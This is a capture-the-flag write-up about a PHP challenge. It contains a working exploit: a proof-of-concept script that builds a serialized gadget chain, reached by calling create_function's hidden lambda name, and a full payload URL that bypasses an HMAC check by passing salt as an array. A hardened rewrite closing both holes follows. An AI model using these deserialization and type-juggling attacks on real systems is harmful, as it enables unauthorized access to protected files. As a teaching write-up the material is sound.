```php
<?php
class Bird{
    public $funcs;
    public $salt;
    public $flag;
    function say_flag(){
        $secret = hash_hmac('sha256', $_GET['salt'], file_get_contents('/flag'));
        $hmac = hash_hmac('sha256', $_GET['password'], $secret);
        if($_GET['mac'] === $hmac){
            show_source("/flag");
        }
    }
    function __destruct(){
        $self_func=$this->funcs;
        $self_func();
    }
}
if(isset($_GET['p'])){
    $funcs = create_function("","unserialize($_GET['d']);");
    $_GET['p']();
}else{
    show_source(__FILE__);
}
```
The line `create_function("","unserialize($_GET['d']);");` is the key point of this challenge: exploiting anonymous functions (see https://www.cnblogs.com/leixiao-/p/9818602.html). A function created by `create_function` also has a name, `\0lambda_%d`, where `%d` is the index of that anonymous function among those created in the current process. Calling that anonymous function by name and passing the `d` parameter triggers the deserialization.

Constructing the POC:
```php
<?php
class Bird{
    public $funcs;
    public $salt;
    public $flag;
    function say_flag(){
        echo "-------say_flag-------";
        // The real check is commented out locally; only the gadget chain matters for building the payload.
        // $secret = hash_hmac('sha256', $_GET['salt'], file_get_contents('/flag'));
        // $hmac = hash_hmac('sha256', $_GET['password'], $secret);
        // if($_GET['mac'] === $hmac){
        //     show_source("/flag");
        // }
    }
    function __destruct(){
        $self_func=$this->funcs;
        $self_func();
    }
}
$Bird = new Bird();
// __destruct() calls $this->funcs as a callable; an [object, 'method'] array makes it invoke say_flag() on the inner Bird.
$Bird->funcs = [new Bird(),'say_flag'];
echo urlencode(serialize($Bird));
?>
```
As for the hash check, passing an array as `$_GET['salt']` (`salt[]=`) is enough: `hash_hmac()` returns `NULL` (with a warning) when given an array on PHP 7, so `$secret` becomes `NULL`, the `NULL` key is coerced to the empty string, and `$hmac` becomes controllable because it no longer depends on the flag.
?p=%00lambda_1&d=O%3A4%3A%22Bird%22%3A3%3A%7Bs%3A5%3A%22funcs%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A4%3A%22Bird%22%3A3%3A%7Bs%3A5%3A%22funcs%22%3BN%3Bs%3A4%3A%22salt%22%3BN%3Bs%3A4%3A%22flag%22%3BN%3B%7Di%3A1%3Bs%3A8%3A%22say_flag%22%3B%7Ds%3A4%3A%22salt%22%3BN%3Bs%3A4%3A%22flag%22%3BN%3B%7D&salt[]=&password=mochu7&mac=c35b38d9886ca1852ac7a27a016721bf3de37a2c9231d96bc89ee3ab4d366067
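The two weaknesses above (a user-chosen callable reaching `create_function`'s `\0lambda_N` name and `unserialize()`, and `hash_hmac()` accepting a non-string `salt`) are both fixed in the following hardened rewrite of the challenge. This is an added example, not code from the original writeup or the challenge author; the `requireString` helper and the `$actions` allow-list are hypothetical names, and the `/flag` path is kept from the challenge. Note that `create_function` itself only exists on PHP 7.x (it was removed in PHP 8.0), which is why the original dynamic call is reachable at all.

```php
<?php
// Added example (not part of the original writeup): a hardened version of the
// challenge's Bird class that closes both holes the writeup exploits.
class Bird
{
    public $funcs;
    public $salt;
    public $flag;

    // Hypothetical helper: reject any parameter that is not a plain string, so
    // ?salt[]= can no longer make hash_hmac() return NULL and zero out the key.
    private static function requireString(array $src, string $key): string
    {
        if (!isset($src[$key]) || !is_string($src[$key])) {
            http_response_code(400);
            exit("parameter '$key' must be a string");
        }
        return $src[$key];
    }

    public function say_flag(): void
    {
        $salt     = self::requireString($_GET, 'salt');
        $password = self::requireString($_GET, 'password');
        $mac      = self::requireString($_GET, 'mac');

        $secret = hash_hmac('sha256', $salt, file_get_contents('/flag'));
        $hmac   = hash_hmac('sha256', $password, $secret);

        // Constant-time comparison instead of ===, with both sides guaranteed strings.
        if (hash_equals($hmac, $mac)) {
            show_source('/flag');
        }
    }

    // No __destruct() that invokes an attacker-controlled callable: the gadget
    // chain in the writeup relied entirely on $this->funcs being called here.
}

// Dispatch through an explicit allow-list instead of calling $_GET['p']() directly,
// and never hand user input to unserialize(). With no create_function() call there is
// also no "\0lambda_N" function for a request to name.
$actions = [
    'source' => function (): void { show_source(__FILE__); },
];
$action = (isset($_GET['p']) && is_string($_GET['p'])) ? $_GET['p'] : 'source';
if (!array_key_exists($action, $actions)) {
    http_response_code(404);
    exit('unknown action');
}
$actions[$action]();
```

The array-to-`NULL` behaviour is the part most worth checking in your own code: on PHP 7, `hash_hmac('sha256', [], $key)` logs a warning and returns `NULL` rather than throwing, so any HMAC built from request parameters needs an `is_string()` guard before it, not just a `===` on the result.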
Original article: https://blog.csdn.net/mochu7777777/article/details/134781818